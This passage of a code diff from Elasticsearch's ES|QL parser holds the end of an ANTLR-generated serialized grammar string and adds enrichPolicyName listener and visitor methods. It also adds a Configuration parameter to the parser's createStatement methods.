"\u01a5\u01a6\u0003\u008eG\u0000\u01a6\u01a8\u0003\u00a2Q\u0000\u01a7\u01a9"+ + "\u0003T*\u0000\u01a8\u01a7\u0001\u0000\u0000\u0000\u01a8\u01a9\u0001\u0000"+ + "\u0000\u0000\u01a9O\u0001\u0000\u0000\u0000\u01aa\u01ab\u0005\n\u0000"+ + "\u0000\u01ab\u01ac\u0003\u008eG\u0000\u01ac\u01ad\u0003\u00a2Q\u0000\u01ad"+ + "Q\u0001\u0000\u0000\u0000\u01ae\u01af\u0005\u001b\u0000\u0000\u01af\u01b0"+ + "\u00030\u0018\u0000\u01b0S\u0001\u0000\u0000\u0000\u01b1\u01b6\u0003V"+ + "+\u0000\u01b2\u01b3\u0005>\u0000\u0000\u01b3\u01b5\u0003V+\u0000\u01b4"+ + "\u01b2\u0001\u0000\u0000\u0000\u01b5\u01b8\u0001\u0000\u0000\u0000\u01b6"+ + "\u01b4\u0001\u0000\u0000\u0000\u01b6\u01b7\u0001\u0000\u0000\u0000\u01b7"+ + "U\u0001\u0000\u0000\u0000\u01b8\u01b6\u0001\u0000\u0000\u0000\u01b9\u01ba"+ + "\u00036\u001b\u0000\u01ba\u01bb\u0005:\u0000\u0000\u01bb\u01bc\u0003\u0098"+ + "L\u0000\u01bcW\u0001\u0000\u0000\u0000\u01bd\u01be\u0005\u0006\u0000\u0000"+ + "\u01be\u01bf\u0003Z-\u0000\u01bfY\u0001\u0000\u0000\u0000\u01c0\u01c1"+ + "\u0005c\u0000\u0000\u01c1\u01c2\u0003\u0002\u0001\u0000\u01c2\u01c3\u0005"+ + "d\u0000\u0000\u01c3[\u0001\u0000\u0000\u0000\u01c4\u01c5\u0005!\u0000"+ + "\u0000\u01c5\u01c6\u0005\u0088\u0000\u0000\u01c6]\u0001\u0000\u0000\u0000"+ + "\u01c7\u01c8\u0005\u0005\u0000\u0000\u01c8\u01cb\u0003`0\u0000\u01c9\u01ca"+ + "\u0005J\u0000\u0000\u01ca\u01cc\u00032\u0019\u0000\u01cb\u01c9\u0001\u0000"+ + "\u0000\u0000\u01cb\u01cc\u0001\u0000\u0000\u0000\u01cc\u01d6\u0001\u0000"+ + "\u0000\u0000\u01cd\u01ce\u0005O\u0000\u0000\u01ce\u01d3\u0003b1\u0000"+ + "\u01cf\u01d0\u0005>\u0000\u0000\u01d0\u01d2\u0003b1\u0000\u01d1\u01cf"+ + "\u0001\u0000\u0000\u0000\u01d2\u01d5\u0001\u0000\u0000\u0000\u01d3\u01d1"+ + "\u0001\u0000\u0000\u0000\u01d3\u01d4\u0001\u0000\u0000\u0000\u01d4\u01d7"+ + "\u0001\u0000\u0000\u0000\u01d5\u01d3\u0001\u0000\u0000\u0000\u01d6\u01cd"+ + "\u0001\u0000\u0000\u0000\u01d6\u01d7\u0001\u0000\u0000\u0000\u01d7_\u0001"+ + "\u0000\u0000\u0000\u01d8\u01d9\u0007\u0004\u0000\u0000\u01d9a\u0001\u0000"+ + "\u0000\u0000\u01da\u01db\u00032\u0019\u0000\u01db\u01dc\u0005:\u0000\u0000"+ + "\u01dc\u01de\u0001\u0000\u0000\u0000\u01dd\u01da\u0001\u0000\u0000\u0000"+ + "\u01dd\u01de\u0001\u0000\u0000\u0000\u01de\u01df\u0001\u0000\u0000\u0000"+ + "\u01df\u01e0\u00032\u0019\u0000\u01e0c\u0001\u0000\u0000\u0000\u01e1\u01e2"+ + "\u0005\r\u0000\u0000\u01e2\u01e3\u0003\u0098L\u0000\u01e3e\u0001\u0000"+ + "\u0000\u0000\u01e4\u01e5\u0005\u001a\u0000\u0000\u01e5\u01e6\u0003\u001c"+ + "\u000e\u0000\u01e6\u01e7\u0005J\u0000\u0000\u01e7\u01e8\u00034\u001a\u0000"+ + "\u01e8g\u0001\u0000\u0000\u0000\u01e9\u01ea\u0005\u0011\u0000\u0000\u01ea"+ + "\u01ed\u0003,\u0016\u0000\u01eb\u01ec\u0005;\u0000\u0000\u01ec\u01ee\u0003"+ + "\u000e\u0007\u0000\u01ed\u01eb\u0001\u0000\u0000\u0000\u01ed\u01ee\u0001"+ + "\u0000\u0000\u0000\u01eei\u0001\u0000\u0000\u0000\u01ef\u01f0\u0005\u0004"+ + "\u0000\u0000\u01f0\u01f3\u00030\u0018\u0000\u01f1\u01f2\u0005J\u0000\u0000"+ + "\u01f2\u01f4\u00030\u0018\u0000\u01f3\u01f1\u0001\u0000\u0000\u0000\u01f3"+ + "\u01f4\u0001\u0000\u0000\u0000\u01f4\u01fa\u0001\u0000\u0000\u0000\u01f5"+ + "\u01f6\u0005\u0084\u0000\u0000\u01f6\u01f7\u00030\u0018\u0000\u01f7\u01f8"+ + "\u0005>\u0000\u0000\u01f8\u01f9\u00030\u0018\u0000\u01f9\u01fb\u0001\u0000"+ + "\u0000\u0000\u01fa\u01f5\u0001\u0000\u0000\u0000\u01fa\u01fb\u0001\u0000"+ + "\u0000\u0000\u01fbk\u0001\u0000\u0000\u0000\u01fc\u01fd\u0005\u001e\u0000"+ + "\u0000\u01fd\u01fe\u00034\u001a\u0000\u01fem\u0001\u0000\u0000\u0000\u01ff"+ + "\u0200\u0005\u0015\u0000\u0000\u0200\u0201\u0003p8\u0000\u0201o\u0001"+ + "\u0000\u0000\u0000\u0202\u0204\u0003r9\u0000\u0203\u0202\u0001\u0000\u0000"+ + "\u0000\u0204\u0205\u0001\u0000\u0000\u0000\u0205\u0203\u0001\u0000\u0000"+ + "\u0000\u0205\u0206\u0001\u0000\u0000\u0000\u0206q\u0001\u0000\u0000\u0000"+ + "\u0207\u0208\u0005c\u0000\u0000\u0208\u0209\u0003t:\u0000\u0209\u020a"+ + "\u0005d\u0000\u0000\u020as\u0001\u0000\u0000\u0000\u020b\u020c\u0006:"+ + "\uffff\uffff\u0000\u020c\u020d\u0003v;\u0000\u020d\u0213\u0001\u0000\u0000"+ + "\u0000\u020e\u020f\n\u0001\u0000\u0000\u020f\u0210\u00054\u0000\u0000"+ + "\u0210\u0212\u0003v;\u0000\u0211\u020e\u0001\u0000\u0000\u0000\u0212\u0215"+ + "\u0001\u0000\u0000\u0000\u0213\u0211\u0001\u0000\u0000\u0000\u0213\u0214"+ + "\u0001\u0000\u0000\u0000\u0214u\u0001\u0000\u0000\u0000\u0215\u0213\u0001"+ + "\u0000\u0000\u0000\u0216\u0217\u0003\u0006\u0003\u0000\u0217w\u0001\u0000"+ + "\u0000\u0000\u0218\u0219\u0005\u001f\u0000\u0000\u0219y\u0001\u0000\u0000"+ + "\u0000\u021a\u021f\u0003|>\u0000\u021b\u021c\u0005>\u0000\u0000\u021c"+ + "\u021e\u0003|>\u0000\u021d\u021b\u0001\u0000\u0000\u0000\u021e\u0221\u0001"+ + "\u0000\u0000\u0000\u021f\u021d\u0001\u0000\u0000\u0000\u021f\u0220\u0001"+ + "\u0000\u0000\u0000\u0220{\u0001\u0000\u0000\u0000\u0221\u021f\u0001\u0000"+ + "\u0000\u0000\u0222\u0223\u00036\u001b\u0000\u0223\u0224\u0005:\u0000\u0000"+ + "\u0224\u0225\u0003~?\u0000\u0225}\u0001\u0000\u0000\u0000\u0226\u0229"+ + "\u0003\u0098L\u0000\u0227\u0229\u00036\u001b\u0000\u0228\u0226\u0001\u0000"+ + "\u0000\u0000\u0228\u0227\u0001\u0000\u0000\u0000\u0229\u007f\u0001\u0000"+ + "\u0000\u0000\u022a\u022b\u0005\u0012\u0000\u0000\u022b\u022c\u0003\u0098"+ + "L\u0000\u022c\u022d\u0005J\u0000\u0000\u022d\u0230\u0003\u0012\t\u0000"+ + "\u022e\u022f\u0005O\u0000\u0000\u022f\u0231\u0003z=\u0000\u0230\u022e"+ + "\u0001\u0000\u0000\u0000\u0230\u0231\u0001\u0000\u0000\u0000\u0231\u0081"+ + "\u0001\u0000\u0000\u0000\u0232\u0236\u0005\u0007\u0000\u0000\u0233\u0234"+ + "\u00030\u0018\u0000\u0234\u0235\u0005:\u0000\u0000\u0235\u0237\u0001\u0000"+ + "\u0000\u0000\u0236\u0233\u0001\u0000\u0000\u0000\u0236\u0237\u0001\u0000"+ + "\u0000\u0000\u0237\u0238\u0001\u0000\u0000\u0000\u0238\u0239\u0003\u008e"+ + "G\u0000\u0239\u023a\u0005O\u0000\u0000\u023a\u023b\u0003>\u001f\u0000"+ + "\u023b\u0083\u0001\u0000\u0000\u0000\u023c\u023d\u0006B\uffff\uffff\u0000"+ + "\u023d\u023e\u0005G\u0000\u0000\u023e\u025a\u0003\u0084B\b\u023f\u025a"+ + "\u0003\u008aE\u0000\u0240\u025a\u0003\u0086C\u0000\u0241\u0243\u0003\u008a"+ + "E\u0000\u0242\u0244\u0005G\u0000\u0000\u0243\u0242\u0001\u0000\u0000\u0000"+ + "\u0243\u0244\u0001\u0000\u0000\u0000\u0244\u0245\u0001\u0000\u0000\u0000"+ + "\u0245\u0246\u0005C\u0000\u0000\u0246\u0247\u0005c\u0000\u0000\u0247\u024c"+ + "\u0003\u008aE\u0000\u0248\u0249\u0005>\u0000\u0000\u0249\u024b\u0003\u008a"+ + "E\u0000\u024a\u0248\u0001\u0000\u0000\u0000\u024b\u024e\u0001\u0000\u0000"+ + "\u0000\u024c\u024a\u0001\u0000\u0000\u0000\u024c\u024d\u0001\u0000\u0000"+ + "\u0000\u024d\u024f\u0001\u0000\u0000\u0000\u024e\u024c\u0001\u0000\u0000"+ + "\u0000\u024f\u0250\u0005d\u0000\u0000\u0250\u025a\u0001\u0000\u0000\u0000"+ + "\u0251\u0252\u0003\u008aE\u0000\u0252\u0254\u0005D\u0000\u0000\u0253\u0255"+ + "\u0005G\u0000\u0000\u0254\u0253\u0001\u0000\u0000\u0000\u0254\u0255\u0001"+ + "\u0000\u0000\u0000\u0255\u0256\u0001\u0000\u0000\u0000\u0256\u0257\u0005"+ + "H\u0000\u0000\u0257\u025a\u0001\u0000\u0000\u0000\u0258\u025a\u0003\u0088"+ + "D\u0000\u0259\u023c\u0001\u0000\u0000\u0000\u0259\u023f\u0001\u0000\u0000"+ + "\u0000\u0259\u0240\u0001\u0000\u0000\u0000\u0259\u0241\u0001\u0000\u0000"+ + "\u0000\u0259\u0251\u0001\u0000\u0000\u0000\u0259\u0258\u0001\u0000\u0000"+ + "\u0000\u025a\u0263\u0001\u0000\u0000\u0000\u025b\u025c\n\u0005\u0000\u0000"+ + "\u025c\u025d\u00058\u0000\u0000\u025d\u0262\u0003\u0084B\u0006\u025e\u025f"+ + "\n\u0004\u0000\u0000\u025f\u0260\u0005K\u0000\u0000\u0260\u0262\u0003"+ + "\u0084B\u0005\u0261\u025b\u0001\u0000\u0000\u0000\u0261\u025e\u0001\u0000"+ + "\u0000\u0000\u0262\u0265\u0001\u0000\u0000\u0000\u0263\u0261\u0001\u0000"+ + "\u0000\u0000\u0263\u0264\u0001\u0000\u0000\u0000\u0264\u0085\u0001\u0000"+ + "\u0000\u0000\u0265\u0263\u0001\u0000\u0000\u0000\u0266\u0268\u0003\u008a"+ + "E\u0000\u0267\u0269\u0005G\u0000\u0000\u0268\u0267\u0001\u0000\u0000\u0000"+ + "\u0268\u0269\u0001\u0000\u0000\u0000\u0269\u026a\u0001\u0000\u0000\u0000"+ + "\u026a\u026b\u0005F\u0000\u0000\u026b\u026c\u0003\u00a2Q\u0000\u026c\u0285"+ + "\u0001\u0000\u0000\u0000\u026d\u026f\u0003\u008aE\u0000\u026e\u0270\u0005"+ + "G\u0000\u0000\u026f\u026e\u0001\u0000\u0000\u0000\u026f\u0270\u0001\u0000"+ + "\u0000\u0000\u0270\u0271\u0001\u0000\u0000\u0000\u0271\u0272\u0005M\u0000"+ + "\u0000\u0272\u0273\u0003\u00a2Q\u0000\u0273\u0285\u0001\u0000\u0000\u0000"+ + "\u0274\u0276\u0003\u008aE\u0000\u0275\u0277\u0005G\u0000\u0000\u0276\u0275"+ + "\u0001\u0000\u0000\u0000\u0276\u0277\u0001\u0000\u0000\u0000\u0277\u0278"+ + "\u0001\u0000\u0000\u0000\u0278\u0279\u0005F\u0000\u0000\u0279\u027a\u0005"+ + "c\u0000\u0000\u027a\u027f\u0003\u00a2Q\u0000\u027b\u027c\u0005>\u0000"+ + "\u0000\u027c\u027e\u0003\u00a2Q\u0000\u027d\u027b\u0001\u0000\u0000\u0000"+ + "\u027e\u0281\u0001\u0000\u0000\u0000\u027f\u027d\u0001\u0000\u0000\u0000"+ + "\u027f\u0280\u0001\u0000\u0000\u0000\u0280\u0282\u0001\u0000\u0000\u0000"+ + "\u0281\u027f\u0001\u0000\u0000\u0000\u0282\u0283\u0005d\u0000\u0000\u0283"+ + "\u0285\u0001\u0000\u0000\u0000\u0284\u0266\u0001\u0000\u0000\u0000\u0284"+ + "\u026d\u0001\u0000\u0000\u0000\u0284\u0274\u0001\u0000\u0000\u0000\u0285"+ + "\u0087\u0001\u0000\u0000\u0000\u0286\u0289\u00030\u0018\u0000\u0287\u0288"+ + "\u0005<\u0000\u0000\u0288\u028a\u0003\n\u0005\u0000\u0289\u0287\u0001"+ + "\u0000\u0000\u0000\u0289\u028a\u0001\u0000\u0000\u0000\u028a\u028b\u0001"+ + "\u0000\u0000\u0000\u028b\u028c\u0005=\u0000\u0000\u028c\u028d\u0003\u0098"+ + "L\u0000\u028d\u0089\u0001\u0000\u0000\u0000\u028e\u0294\u0003\u008cF\u0000"+ + "\u028f\u0290\u0003\u008cF\u0000\u0290\u0291\u0003\u00a4R\u0000\u0291\u0292"+ + "\u0003\u008cF\u0000\u0292\u0294\u0001\u0000\u0000\u0000\u0293\u028e\u0001"+ + "\u0000\u0000\u0000\u0293\u028f\u0001\u0000\u0000\u0000\u0294\u008b\u0001"+ + "\u0000\u0000\u0000\u0295\u0296\u0006F\uffff\uffff\u0000\u0296\u029a\u0003"+ + "\u008eG\u0000\u0297\u0298\u0007\u0005\u0000\u0000\u0298\u029a\u0003\u008c"+ + "F\u0003\u0299\u0295\u0001\u0000\u0000\u0000\u0299\u0297\u0001\u0000\u0000"+ + "\u0000\u029a\u02a3\u0001\u0000\u0000\u0000\u029b\u029c\n\u0002\u0000\u0000"+ + "\u029c\u029d\u0007\u0006\u0000\u0000\u029d\u02a2\u0003\u008cF\u0003\u029e"+ + "\u029f\n\u0001\u0000\u0000\u029f\u02a0\u0007\u0005\u0000\u0000\u02a0\u02a2"+ + "\u0003\u008cF\u0002\u02a1\u029b\u0001\u0000\u0000\u0000\u02a1\u029e\u0001"+ + "\u0000\u0000\u0000\u02a2\u02a5\u0001\u0000\u0000\u0000\u02a3\u02a1\u0001"+ + "\u0000\u0000\u0000\u02a3\u02a4\u0001\u0000\u0000\u0000\u02a4\u008d\u0001"+ + "\u0000\u0000\u0000\u02a5\u02a3\u0001\u0000\u0000\u0000\u02a6\u02a7\u0006"+ + "G\uffff\uffff\u0000\u02a7\u02af\u0003\u0098L\u0000\u02a8\u02af\u00030"+ + "\u0018\u0000\u02a9\u02af\u0003\u0090H\u0000\u02aa\u02ab\u0005c\u0000\u0000"+ + "\u02ab\u02ac\u0003\u0084B\u0000\u02ac\u02ad\u0005d\u0000\u0000\u02ad\u02af"+ + "\u0001\u0000\u0000\u0000\u02ae\u02a6\u0001\u0000\u0000\u0000\u02ae\u02a8"+ + "\u0001\u0000\u0000\u0000\u02ae\u02a9\u0001\u0000\u0000\u0000\u02ae\u02aa"+ + "\u0001\u0000\u0000\u0000\u02af\u02b5\u0001\u0000\u0000\u0000\u02b0\u02b1"+ + "\n\u0001\u0000\u0000\u02b1\u02b2\u0005<\u0000\u0000\u02b2\u02b4\u0003"+ + "\n\u0005\u0000\u02b3\u02b0\u0001\u0000\u0000\u0000\u02b4\u02b7\u0001\u0000"+ + "\u0000\u0000\u02b5\u02b3\u0001\u0000\u0000\u0000\u02b5\u02b6\u0001\u0000"+ + "\u0000\u0000\u02b6\u008f\u0001\u0000\u0000\u0000\u02b7\u02b5\u0001\u0000"+ + "\u0000\u0000\u02b8\u02b9\u0003\u0092I\u0000\u02b9\u02c7\u0005c\u0000\u0000"+ + "\u02ba\u02c8\u0005Y\u0000\u0000\u02bb\u02c0\u0003\u0084B\u0000\u02bc\u02bd"+ + "\u0005>\u0000\u0000\u02bd\u02bf\u0003\u0084B\u0000\u02be\u02bc\u0001\u0000"+ + "\u0000\u0000\u02bf\u02c2\u0001\u0000\u0000\u0000\u02c0\u02be\u0001\u0000"+ + "\u0000\u0000\u02c0\u02c1\u0001\u0000\u0000\u0000\u02c1\u02c5\u0001\u0000"+ + "\u0000\u0000\u02c2\u02c0\u0001\u0000\u0000\u0000\u02c3\u02c4\u0005>\u0000"+ + "\u0000\u02c4\u02c6\u0003\u0094J\u0000\u02c5\u02c3\u0001\u0000\u0000\u0000"+ + "\u02c5\u02c6\u0001\u0000\u0000\u0000\u02c6\u02c8\u0001\u0000\u0000\u0000"+ + "\u02c7\u02ba\u0001\u0000\u0000\u0000\u02c7\u02bb\u0001\u0000\u0000\u0000"+ + "\u02c7\u02c8\u0001\u0000\u0000\u0000\u02c8\u02c9\u0001\u0000\u0000\u0000"+ + "\u02c9\u02ca\u0005d\u0000\u0000\u02ca\u0091\u0001\u0000\u0000\u0000\u02cb"+ + "\u02cc\u0003>\u001f\u0000\u02cc\u0093\u0001\u0000\u0000\u0000\u02cd\u02ce"+ + "\u0005\\\u0000\u0000\u02ce\u02d3\u0003\u0096K\u0000\u02cf\u02d0\u0005"+ + ">\u0000\u0000\u02d0\u02d2\u0003\u0096K\u0000\u02d1\u02cf\u0001\u0000\u0000"+ + "\u0000\u02d2\u02d5\u0001\u0000\u0000\u0000\u02d3\u02d1\u0001\u0000\u0000"+ + "\u0000\u02d3\u02d4\u0001\u0000\u0000\u0000\u02d4\u02d6\u0001\u0000\u0000"+ + "\u0000\u02d5\u02d3\u0001\u0000\u0000\u0000\u02d6\u02d7\u0005]\u0000\u0000"+ + "\u02d7\u0095\u0001\u0000\u0000\u0000\u02d8\u02d9\u0003\u00a2Q\u0000\u02d9"+ + "\u02da\u0005=\u0000\u0000\u02da\u02db\u0003\u0098L\u0000\u02db\u0097\u0001"+ + "\u0000\u0000\u0000\u02dc\u0307\u0005H\u0000\u0000\u02dd\u02de\u0003\u00a0"+ + "P\u0000\u02de\u02df\u0005e\u0000\u0000\u02df\u0307\u0001\u0000\u0000\u0000"+ + "\u02e0\u0307\u0003\u009eO\u0000\u02e1\u0307\u0003\u00a0P\u0000\u02e2\u0307"+ + "\u0003\u009aM\u0000\u02e3\u0307\u0003:\u001d\u0000\u02e4\u0307\u0003\u00a2"+ + "Q\u0000\u02e5\u02e6\u0005a\u0000\u0000\u02e6\u02eb\u0003\u009cN\u0000"+ + "\u02e7\u02e8\u0005>\u0000\u0000\u02e8\u02ea\u0003\u009cN\u0000\u02e9\u02e7"+ + "\u0001\u0000\u0000\u0000\u02ea\u02ed\u0001\u0000\u0000\u0000\u02eb\u02e9"+ + "\u0001\u0000\u0000\u0000\u02eb\u02ec\u0001\u0000\u0000\u0000\u02ec\u02ee"+ + "\u0001\u0000\u0000\u0000\u02ed\u02eb\u0001\u0000\u0000\u0000\u02ee\u02ef"+ + "\u0005b\u0000\u0000\u02ef\u0307\u0001\u0000\u0000\u0000\u02f0\u02f1\u0005"+ + "a\u0000\u0000\u02f1\u02f6\u0003\u009aM\u0000\u02f2\u02f3\u0005>\u0000"+ + "\u0000\u02f3\u02f5\u0003\u009aM\u0000\u02f4\u02f2\u0001\u0000\u0000\u0000"+ + "\u02f5\u02f8\u0001\u0000\u0000\u0000\u02f6\u02f4\u0001\u0000\u0000\u0000"+ + "\u02f6\u02f7\u0001\u0000\u0000\u0000\u02f7\u02f9\u0001\u0000\u0000\u0000"+ + "\u02f8\u02f6\u0001\u0000\u0000\u0000\u02f9\u02fa\u0005b\u0000\u0000\u02fa"+ + "\u0307\u0001\u0000\u0000\u0000\u02fb\u02fc\u0005a\u0000\u0000\u02fc\u0301"+ + "\u0003\u00a2Q\u0000\u02fd\u02fe\u0005>\u0000\u0000\u02fe\u0300\u0003\u00a2"+ + "Q\u0000\u02ff\u02fd\u0001\u0000\u0000\u0000\u0300\u0303\u0001\u0000\u0000"+ + "\u0000\u0301\u02ff\u0001\u0000\u0000\u0000\u0301\u0302\u0001\u0000\u0000"+ + "\u0000\u0302\u0304\u0001\u0000\u0000\u0000\u0303\u0301\u0001\u0000\u0000"+ + "\u0000\u0304\u0305\u0005b\u0000\u0000\u0305\u0307\u0001\u0000\u0000\u0000"+ + "\u0306\u02dc\u0001\u0000\u0000\u0000\u0306\u02dd\u0001\u0000\u0000\u0000"+ + "\u0306\u02e0\u0001\u0000\u0000\u0000\u0306\u02e1\u0001\u0000\u0000\u0000"+ + "\u0306\u02e2\u0001\u0000\u0000\u0000\u0306\u02e3\u0001\u0000\u0000\u0000"+ + "\u0306\u02e4\u0001\u0000\u0000\u0000\u0306\u02e5\u0001\u0000\u0000\u0000"+ + "\u0306\u02f0\u0001\u0000\u0000\u0000\u0306\u02fb\u0001\u0000\u0000\u0000"+ + "\u0307\u0099\u0001\u0000\u0000\u0000\u0308\u0309\u0007\u0007\u0000\u0000"+ + "\u0309\u009b\u0001\u0000\u0000\u0000\u030a\u030d\u0003\u009eO\u0000\u030b"+ + "\u030d\u0003\u00a0P\u0000\u030c\u030a\u0001\u0000\u0000\u0000\u030c\u030b"+ + "\u0001\u0000\u0000\u0000\u030d\u009d\u0001\u0000\u0000\u0000\u030e\u0310"+ + "\u0007\u0005\u0000\u0000\u030f\u030e\u0001\u0000\u0000\u0000\u030f\u0310"+ + "\u0001\u0000\u0000\u0000\u0310\u0311\u0001\u0000\u0000\u0000\u0311\u0312"+ + "\u00057\u0000\u0000\u0312\u009f\u0001\u0000\u0000\u0000\u0313\u0315\u0007"+ + "\u0005\u0000\u0000\u0314\u0313\u0001\u0000\u0000\u0000\u0314\u0315\u0001"+ + "\u0000\u0000\u0000\u0315\u0316\u0001\u0000\u0000\u0000\u0316\u0317\u0005"+ + "6\u0000\u0000\u0317\u00a1\u0001\u0000\u0000\u0000\u0318\u0319\u00055\u0000"+ + "\u0000\u0319\u00a3\u0001\u0000\u0000\u0000\u031a\u031b\u0007\b\u0000\u0000"+ + "\u031b\u00a5\u0001\u0000\u0000\u0000\u031c\u031d\u0007\t\u0000\u0000\u031d"+ + "\u031e\u0005r\u0000\u0000\u031e\u031f\u0003\u00a8T\u0000\u031f\u0320\u0003"+ + "\u00aaU\u0000\u0320\u00a7\u0001\u0000\u0000\u0000\u0321\u0322\u0003\u001c"+ + "\u000e\u0000\u0322\u00a9\u0001\u0000\u0000\u0000\u0323\u0324\u0005J\u0000"+ + "\u0000\u0324\u0329\u0003\u00acV\u0000\u0325\u0326\u0005>\u0000\u0000\u0326"+ + "\u0328\u0003\u00acV\u0000\u0327\u0325\u0001\u0000\u0000\u0000\u0328\u032b"+ + "\u0001\u0000\u0000\u0000\u0329\u0327\u0001\u0000\u0000\u0000\u0329\u032a"+ + "\u0001\u0000\u0000\u0000\u032a\u00ab\u0001\u0000\u0000\u0000\u032b\u0329"+ + "\u0001\u0000\u0000\u0000\u032c\u032d\u0003\u008aE\u0000\u032d\u00ad\u0001"+ + "\u0000\u0000\u0000H\u00b9\u00c3\u00e0\u00ef\u00f5\u00fe\u0104\u0111\u0115"+ + "\u0120\u0130\u0138\u013c\u0143\u0149\u0150\u0158\u0160\u0168\u016c\u0170"+ + "\u0175\u0180\u0185\u0189\u0197\u01a2\u01a8\u01b6\u01cb\u01d3\u01d6\u01dd"+ + "\u01ed\u01f3\u01fa\u0205\u0213\u021f\u0228\u0230\u0236\u0243\u024c\u0254"+ + "\u0259\u0261\u0263\u0268\u026f\u0276\u027f\u0284\u0289\u0293\u0299\u02a1"+ + "\u02a3\u02ae\u02b5\u02c0\u02c5\u02c7\u02d3\u02eb\u02f6\u0301\u0306\u030c"+ + "\u030f\u0314\u0329"; public static final ATN _ATN = new ATNDeserializer().deserialize(_serializedATN.toCharArray()); static { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java index 8a9bc07a99eae..24e5e37c33732 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java @@ -632,6 +632,18 @@ public class EsqlBaseParserBaseListener implements EsqlBaseParserListener { *

The default implementation does nothing.

*/ @Override public void exitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx) { } + /** + * {@inheritDoc} + * + *

The default implementation does nothing.

+ */ + @Override public void enterEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { } + /** + * {@inheritDoc} + * + *

The default implementation does nothing.

+ */ + @Override public void exitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { } /** * {@inheritDoc} * diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java index 6c13edd55907a..591e126025943 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java @@ -377,6 +377,13 @@ public class EsqlBaseParserBaseVisitor extends AbstractParseTreeVisitor im * {@link #visitChildren} on {@code ctx}.

*/ @Override public T visitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx) { return visitChildren(ctx); } + /** + * {@inheritDoc} + * + *

The default implementation returns the result of calling + * {@link #visitChildren} on {@code ctx}.

+ */ + @Override public T visitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { return visitChildren(ctx); } /** * {@inheritDoc} * diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java index cfab02cb3d826..9f088be7bcfd4 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java @@ -541,6 +541,16 @@ public interface EsqlBaseParserListener extends ParseTreeListener { * @param ctx the parse tree */ void exitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx); + /** + * Enter a parse tree produced by {@link EsqlBaseParser#enrichPolicyName}. + * @param ctx the parse tree + */ + void enterEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx); + /** + * Exit a parse tree produced by {@link EsqlBaseParser#enrichPolicyName}. + * @param ctx the parse tree + */ + void exitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx); /** * Enter a parse tree produced by {@link EsqlBaseParser#enrichWithClause}. * @param ctx the parse tree diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java index b27d3f0210cdb..cc0245d04bf82 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java @@ -332,6 +332,12 @@ public interface EsqlBaseParserVisitor extends ParseTreeVisitor { * @return the visitor result */ T visitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx); + /** + * Visit a parse tree produced by {@link EsqlBaseParser#enrichPolicyName}. + * @param ctx the parse tree + * @return the visitor result + */ + T visitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx); /** * Visit a parse tree produced by {@link EsqlBaseParser#enrichWithClause}. * @param ctx the parse tree diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java index a8ee18d8b2777..326aa183e1891 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java @@ -21,6 +21,7 @@ import org.elasticsearch.xpack.esql.core.util.StringUtils; import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry; import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; +import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.telemetry.PlanTelemetry; import java.util.BitSet; @@ -98,20 +99,20 @@ public void setEsqlConfig(EsqlConfig config) { } // testing utility - public LogicalPlan createStatement(String query) { - return createStatement(query, new QueryParams()); + public LogicalPlan createStatement(String query, Configuration configuration) { + return createStatement(query, new QueryParams(), configuration); } // testing utility - public LogicalPlan createStatement(String query, QueryParams params) { - return createStatement(query, params, new PlanTelemetry(new EsqlFunctionRegistry())); + public LogicalPlan createStatement(String query, QueryParams params, Configuration configuration) { + return createStatement(query, params, new PlanTelemetry(new EsqlFunctionRegistry()), configuration); } - public LogicalPlan createStatement(String query, QueryParams params, PlanTelemetry metrics) { + public LogicalPlan createStatement(String query, QueryParams params, PlanTelemetry metrics, Configuration configuration) { if (log.isDebugEnabled()) { log.debug("Parsing as statement: {}", query); } - return invokeParser(query, params, metrics, EsqlBaseParser::singleStatement, AstBuilder::plan); + return invokeParser(query, params, metrics, EsqlBaseParser::singleStatement, 